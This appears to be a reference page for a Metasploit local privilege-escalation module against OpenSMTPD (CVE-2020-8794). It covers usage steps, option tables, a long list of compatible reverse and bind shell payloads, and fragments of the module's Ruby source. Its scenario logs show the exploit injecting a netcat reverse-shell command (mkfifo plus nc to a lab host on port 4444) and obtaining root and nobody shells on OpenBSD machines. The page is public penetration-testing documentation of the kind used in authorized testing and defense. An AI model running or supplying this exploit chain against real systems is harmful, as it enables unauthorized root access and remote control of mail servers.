OpenSMTPD OOB Read Local Privilege Escalation - Metasploit
This page contains detailed information about how to use the exploit/unix/local/opensmtpd_oob_read_lpe metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: OpenSMTPD OOB Read Local Privilege Escalation
Module: exploit/unix/local/opensmtpd_oob_read_lpe
Source code: modules/exploits/unix/local/opensmtpd_oob_read_lpe.rb
Disclosure date: 2020-02-24
Last modification time: 2021-02-17 12:33:59 +0000
Supported architecture(s): cmd
Supported platform(s): Unix
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2020-8794
This module exploits an out-of-bounds read of an attacker-controlled string in OpenSMTPD's MTA implementation to execute a command as the root or nobody user, depending on the kind of grammar OpenSMTPD uses.
Module Ranking and Traits
Module Ranking:
- average: The exploit is generally unreliable or difficult to exploit. More information about ranking can be found here.
Reliability:
- repeatable-session: The module is expected to get a shell every time it runs.
Stability:
- crash-service-down: Module may crash the service, and the service remains down.
Side Effects:
- ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
Basic Usage
Note: To run a local exploit, make sure you are at the msf prompt.
Also, to check the session ID, use the sessions
command.
msf > use exploit/unix/local/opensmtpd_oob_read_lpe
msf exploit(opensmtpd_oob_read_lpe) > show targets
... a list of targets ...
msf exploit(opensmtpd_oob_read_lpe) > set TARGET target-id
msf exploit(opensmtpd_oob_read_lpe) > show options
... show and set options ...
msf exploit(opensmtpd_oob_read_lpe) > set SESSION session-id
msf exploit(opensmtpd_oob_read_lpe) > exploit
Required Options
- SESSION: The session to run this module on.
Knowledge Base
Vulnerable Application
Description
This module exploits an out-of-bounds read of an attacker-controlled string in OpenSMTPD's MTA implementation to execute a command as the root or nobody user, depending on the kind of grammar OpenSMTPD uses.
Setup
- Download OpenBSD 6.6
- Install the system
Verification Steps
Targets
0
This targets OpenSMTPD versions < 6.6.4 by automatically selecting the appropriate grammar.
Options
SESSION
Set this to a valid session ID on an OpenBSD target.
Scenarios
OpenSMTPD 6.6.0 on OpenBSD 6.6
msf5 > use exploit/unix/local/opensmtpd_oob_read_lpe
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > options
Module options (exploit/unix/local/opensmtpd_oob_read_lpe):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 25 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 OpenSMTPD < 6.6.4 (automatic grammar selection)
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set lhost 172.16.249.1
lhost => 172.16.249.1
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set session 1
session => 1
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > run
[+] mkfifo /tmp/gkhbba; nc 172.16.249.1 4444 0/tmp/gkhbba 2>&1; rm /tmp/gkhbba
[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.249.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] OpenSMTPD 6.6.0 is using new grammar
[+] The target appears to be vulnerable. OpenSMTPD 6.6.0 appears vulnerable to CVE-2020-8794.
[*] Started service listener on 0.0.0.0:25
[*] Executing local sendmail(8) command: /usr/sbin/sendmail 'brvaysxuzssmnjkysoh@[172.16.249.1]' < /dev/null && echo true
[*] Client 172.16.249.137:37747 connected
[*] Exploiting new OpenSMTPD grammar for a root shell
[*] Faking SMTP server and sending exploit
[*] Sending: 220
[*] Expecting: /EHLO /
[+] Received: EHLO
[*] Sending: 250
[*] Expecting: /MAIL FROM:<[^>]/
[+] Received: foo.localdomain
MAIL FROM:/tmp/rettgqm 2>&1; rm /tmp/rettgqm; exit 0
[*] Disconnecting client 172.16.249.137:37747
[*] Command shell session 3 opened (172.16.249.1:4444 -> 172.16.249.137:3005) at 2020-03-03 18:40:54 -0600
[*] Server stopped.
id
uid=0(root) gid=0(wheel) groups=0(wheel)
uname -a
OpenBSD foo.localdomain 6.6 GENERIC#353 amd64
^Z
Background session 3? [y/N] y
OpenSMTPD 6.0.4 on OpenBSD 6.3
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > set session 2
session => 2
msf5 exploit(unix/local/opensmtpd_oob_read_lpe) > run
[+] mkfifo /tmp/hkioy; nc 172.16.249.1 4444 0/tmp/hkioy 2>&1; rm /tmp/hkioy
[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.16.249.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] OpenSMTPD 6.0.4 is using old grammar
[+] The target appears to be vulnerable. OpenSMTPD 6.0.4 appears vulnerable to CVE-2020-8794.
[*] Started service listener on 0.0.0.0:25
[*] Executing local sendmail(8) command: /usr/sbin/sendmail 'nozahdogyxewkv@[172.16.249.1]' < /dev/null && echo true
[*] Client 172.16.249.138:10203 connected
[*] Exploiting old OpenSMTPD grammar for a nobody shell
[*] Faking SMTP server and sending exploit
[*] Sending: 220
[*] Expecting: /EHLO /
[+] Received: EHLO
[*] Sending: 250
[*] Expecting: /MAIL FROM:<[^>]/
[+] Received: foo.localdomain
MAIL FROM:
mda-user: nobody
mda-buffer: mkfifo /tmp/jszy; nc 172.16.249.1 4444 0/tmp/jszy 2>&1; rm /tmp/jszy; exit 0
[*] Disconnecting client 172.16.249.138:10203
[*] Command shell session 4 opened (172.16.249.1:4444 -> 172.16.249.138:40377) at 2020-03-03 18:41:06 -0600
[*] Server stopped.
id
uid=32767(nobody) gid=32767(nobody) groups=32767(nobody)
uname -a
OpenBSD foo.localdomain 6.3 GENERIC#100 amd64
Go back to menu.
Msfconsole Usage
Here is how the unix/local/opensmtpd_oob_read_lpe exploit module looks in the msfconsole:
msf6 > use exploit/unix/local/opensmtpd_oob_read_lpe
[*] Using configured payload cmd/unix/reverse_netcat
msf6 exploit(unix/local/opensmtpd_oob_read_lpe) > show info
Name: OpenSMTPD OOB Read Local Privilege Escalation
Module: exploit/unix/local/opensmtpd_oob_read_lpe
Platform: Unix
Arch: cmd
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Average
Disclosed: 2020-02-24
Provided by:
Qualys
wvu <[email protected]>
Module side effects:
ioc-in-logs
Module stability:
crash-service-down
Module reliability:
repeatable-session
Available targets:
Id Name
-- ----
0 OpenSMTPD < 6.6.4 (automatic grammar selection)
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 25 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
Payload information:
Description:
This module exploits an out-of-bounds read of an attacker-controlled
string in OpenSMTPD's MTA implementation to execute a command as the
root or nobody user, depending on the kind of grammar OpenSMTPD
uses.
References:
https://nvd.nist.gov/vuln/detail/CVE-2020-8794
https://seclists.org/oss-sec/2020/q1/96
Module Options
This is a complete list of options available in the unix/local/opensmtpd_oob_read_lpe exploit:
msf6 exploit(unix/local/opensmtpd_oob_read_lpe) > show options
Module options (exploit/unix/local/opensmtpd_oob_read_lpe):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 25 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 OpenSMTPD < 6.6.4 (automatic grammar selection)
Advanced Options
Here is a complete list of advanced options supported by the unix/local/opensmtpd_oob_read_lpe exploit:
msf6 exploit(unix/local/opensmtpd_oob_read_lpe) > show advanced
Module advanced options (exploit/unix/local/opensmtpd_oob_read_lpe):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoCheck true no Run check before exploit
ContextInformationFile no The information file that contains context information
DisablePayloadHandler false no Disable the handler code for the selected payload
EnableContextEncoding false no Use transient context when encoding payloads
ExpectTimeout 3.5 yes Timeout for Expect
ForceExploit false no Override check result
ListenerComm no The specific communication channel to use for this service
SSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
SSLCompression false no Enable SSL/TLS-level compression
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Payload advanced options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
CreateSession true no Create a new session for every successful login
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the unix/local/opensmtpd_oob_read_lpe module can exploit:
msf6 exploit(unix/local/opensmtpd_oob_read_lpe) > show targets
Exploit targets:
Id Name
-- ----
0 OpenSMTPD < 6.6.4 (automatic grammar selection)
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the unix/local/opensmtpd_oob_read_lpe exploit:
msf6 exploit(unix/local/opensmtpd_oob_read_lpe) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/unix/bind_awk normal No Unix Command Shell, Bind TCP (via AWK)
1 payload/cmd/unix/bind_busybox_telnetd normal No Unix Command Shell, Bind TCP (via BusyBox telnetd)
2 payload/cmd/unix/bind_inetd normal No Unix Command Shell, Bind TCP (inetd)
3 payload/cmd/unix/bind_jjs normal No Unix Command Shell, Bind TCP (via jjs)
4 payload/cmd/unix/bind_lua normal No Unix Command Shell, Bind TCP (via Lua)
5 payload/cmd/unix/bind_netcat normal No Unix Command Shell, Bind TCP (via netcat)
6 payload/cmd/unix/bind_netcat_gaping normal No Unix Command Shell, Bind TCP (via netcat -e)
7 payload/cmd/unix/bind_netcat_gaping_ipv6 normal No Unix Command Shell, Bind TCP (via netcat -e) IPv6
8 payload/cmd/unix/bind_nodejs normal No Unix Command Shell, Bind TCP (via nodejs)
9 payload/cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl)
10 payload/cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6
11 payload/cmd/unix/bind_r normal No Unix Command Shell, Bind TCP (via R)
12 payload/cmd/unix/bind_ruby normal No Unix Command Shell, Bind TCP (via Ruby)
13 payload/cmd/unix/bind_ruby_ipv6 normal No Unix Command Shell, Bind TCP (via Ruby) IPv6
14 payload/cmd/unix/bind_socat_udp normal No Unix Command Shell, Bind UDP (via socat)
15 payload/cmd/unix/bind_stub normal No Unix Command Shell, Bind TCP (stub)
16 payload/cmd/unix/bind_zsh normal No Unix Command Shell, Bind TCP (via Zsh)
17 payload/cmd/unix/generic normal No Unix Command, Generic Command Execution
18 payload/cmd/unix/pingback_bind normal No Unix Command Shell, Pingback Bind TCP (via netcat)
19 payload/cmd/unix/pingback_reverse normal No Unix Command Shell, Pingback Reverse TCP (via netcat)
20 payload/cmd/unix/reverse normal No Unix Command Shell, Double Reverse TCP (telnet)
21 payload/cmd/unix/reverse_awk normal No Unix Command Shell, Reverse TCP (via AWK)
22 payload/cmd/unix/reverse_bash normal No Unix Command Shell, Reverse TCP (/dev/tcp)
23 payload/cmd/unix/reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet)
24 payload/cmd/unix/reverse_bash_udp normal No Unix Command Shell, Reverse UDP (/dev/udp)
25 payload/cmd/unix/reverse_jjs normal No Unix Command Shell, Reverse TCP (via jjs)
26 payload/cmd/unix/reverse_ksh normal No Unix Command Shell, Reverse TCP (via Ksh)
27 payload/cmd/unix/reverse_lua normal No Unix Command Shell, Reverse TCP (via Lua)
28 payload/cmd/unix/reverse_ncat_ssl normal No Unix Command Shell, Reverse TCP (via ncat)
29 payload/cmd/unix/reverse_netcat normal No Unix Command Shell, Reverse TCP (via netcat)
30 payload/cmd/unix/reverse_netcat_gaping normal No Unix Command Shell, Reverse TCP (via netcat -e)
31 payload/cmd/unix/reverse_nodejs normal No Unix Command Shell, Reverse TCP (via nodejs)
32 payload/cmd/unix/reverse_openssl normal No Unix Command Shell, Double Reverse TCP SSL (openssl)
33 payload/cmd/unix/reverse_perl normal No Unix Command Shell, Reverse TCP (via Perl)
34 payload/cmd/unix/reverse_perl_ssl normal No Unix Command Shell, Reverse TCP SSL (via perl)
35 payload/cmd/unix/reverse_php_ssl normal No Unix Command Shell, Reverse TCP SSL (via php)
36 payload/cmd/unix/reverse_python normal No Unix Command Shell, Reverse TCP (via Python)
37 payload/cmd/unix/reverse_python_ssl normal No Unix Command Shell, Reverse TCP SSL (via python)
38 payload/cmd/unix/reverse_r normal No Unix Command Shell, Reverse TCP (via R)
39 payload/cmd/unix/reverse_ruby normal No Unix Command Shell, Reverse TCP (via Ruby)
40 payload/cmd/unix/reverse_ruby_ssl normal No Unix Command Shell, Reverse TCP SSL (via Ruby)
41 payload/cmd/unix/reverse_socat_udp normal No Unix Command Shell, Reverse UDP (via socat)
42 payload/cmd/unix/reverse_ssh normal No Unix Command Shell, Reverse TCP SSH
43 payload/cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet)
44 payload/cmd/unix/reverse_stub normal No Unix Command Shell, Reverse TCP (stub)
45 payload/cmd/unix/reverse_tclsh normal No Unix Command Shell, Reverse TCP (via Tclsh)
46 payload/cmd/unix/reverse_zsh normal No Unix Command Shell, Reverse TCP (via Zsh)
47 payload/generic/custom normal No Custom Payload
48 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
49 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
Evasion Options
Here is the full list of possible evasion options supported by the unix/local/opensmtpd_oob_read_lpe exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(unix/local/opensmtpd_oob_read_lpe) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
TCP::max_send_size 0 no Maximum tcp segment size. (0 = disable)
TCP::send_delay 0 no Delays inserted before every send. (0 = disable)
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
smtpd(8) help could not be displayed.
Here is a relevant code snippet related to the "smtpd(8) help could not be displayed." error message:
78:
79: def check
80: smtpd_help = cmd_exec('smtpd -h')
81:
82: if smtpd_help.empty?
83: return CheckCode::Unknown('smtpd(8) help could not be displayed.')
84: end
85:
86: version = smtpd_help.scan(/^version: OpenSMTPD ([\d.p]+)$/).flatten.first
87:
88: unless version
OpenSMTPD version could not be found.
Here is a relevant code snippet related to the "OpenSMTPD version could not be found." error message:
84: end
85:
86: version = smtpd_help.scan(/^version: OpenSMTPD ([\d.p]+)$/).flatten.first
87:
88: unless version
89: return CheckCode::Unknown('OpenSMTPD version could not be found.')
90: end
91:
92: version = Rex::Version.new(version)
93:
94: if version < target[:patched_version]
OpenSMTPD <VERSION> is NOT vulnerable to CVE-2020-8794.
Here is a relevant code snippet related to the "OpenSMTPD <VERSION> is NOT vulnerable to CVE-2020-8794." error message:
103: return CheckCode::Appears(
104: "OpenSMTPD #{version} appears vulnerable to CVE-2020-8794."
105: )
106: end
107:
108: CheckCode::Safe("OpenSMTPD #{version} is NOT vulnerable to CVE-2020-8794.")
109: end
110:
111: def exploit
112: start_service
113:
Could not send mail. Is OpenSMTPD running?
Here is a relevant code snippet related to the "Could not send mail. Is OpenSMTPD running?" error message:
113:
114: sendmail = "/usr/sbin/sendmail '#{rcpt_to}' < /dev/null && echo true"
115:
116: print_status("Executing local sendmail(8) command: #{sendmail}")
117: if cmd_exec(sendmail) != 'true'
118: fail_with(Failure::Unknown, 'Could not send mail. Is OpenSMTPD running?')
119: end
120: end
121:
122: def on_client_connect(client)
123: print_status("Client #{client.peerhost}:#{client.peerport} connected")
Could not determine OpenSMTPD grammar
Here is a relevant code snippet related to the "Could not determine OpenSMTPD grammar" error message:
148: mda-usertable: <getpwnam>
149: mda-user: nobody
150: mda-buffer: #{payload.encoded}; exit 0\x00
151: EOF
152: else
153: fail_with(Failure::BadConfig, 'Could not determine OpenSMTPD grammar')
154: end
155:
156: sploit = {
157: '220' => /EHLO /,
158: '250' => /MAIL FROM:<[^>]/,
Go back to menu.
Related Pull Requests
- #15556 Merged Pull Request: Add shell support to enum_unattended module
- #15564 Merged Pull Request: Update post_common mixin methods to support powershell session type
- #15570 Merged Pull Request: Fix smb enum gpp module
- #15546 Merged Pull Request: Fix #15480, fix IgnoreUnknownPayloads for stageless reverse_http payloads
- #15561 Merged Pull Request: Add an exploit for ProxyShell
- #15525 Merged Pull Request: Add Lucee Administrator CVE-2021-21307 exploit
- #15332 Merged Pull Request: fix a localization issue and some other minor issues in
rename_file
method - #15540 Merged Pull Request: Add option for running
cmd_execute
in a subshell - #15303 Merged Pull Request: Fix
dir
method for windows shell sessions - #15547 Merged Pull Request: Bump rex-text to 0.2.36
References
See Also
Check also the following modules related to this module:
- exploit/unix/smtp/opensmtpd_mail_from_rce
- exploit/unix/local/at_persistence
- exploit/unix/local/chkrootkit
- exploit/unix/local/emacs_movemail
- exploit/unix/local/exim_perl_startup
- exploit/unix/local/netbsd_mail_local
- exploit/unix/local/setuid_nmap
- exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe
- exploit/linux/local/pihole_remove_commands_lpe
- exploit/linux/local/vmware_workspace_one_access_certproxy_lpe
- exploit/linux/local/zyxel_suid_cp_lpe
- exploit/osx/local/vmware_fusion_lpe
- exploit/windows/local/anyconnect_lpe
- exploit/windows/local/cve_2017_8464_lnk_lpe
- exploit/windows/local/cve_2020_1054_drawiconex_lpe
- exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
- auxiliary/dos/windows/nat/nat_helper
- auxiliary/server/dns/spoofhelper
- exploit/linux/local/libuser_roothelper_priv_esc
- exploit/linux/local/ptrace_traceme_pkexec_helper
- exploit/linux/misc/mongod_native_helper
- exploit/windows/browser/ms13_090_cardspacesigninhelper
- exploit/windows/http/adobe_robohelper_authbypass
- exploit/windows/local/bypassuac_fodhelper
- exploit/linux/local/netfilter_xtables_heap_oob_write_priv_esc
Related Nessus plugins:
- FreeBSD : OpenSMTPd -- LPE and RCE in OpenSMTPD's default install (40c75597-574a-11ea-bff8-c85b76ce9b5a)
- FreeBSD : OpenSMTPd -- LPE and RCE in OpenSMTPD's default install (f0683976-5779-11ea-8a77-1c872ccb1e42)
- Debian DSA-4634-1 : opensmtpd - security update
- Ubuntu 18.04 LTS / 19.10 : OpenSMTPD vulnerabilities (USN-4294-1)
Authors
- Qualys
- wvu
Version
This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.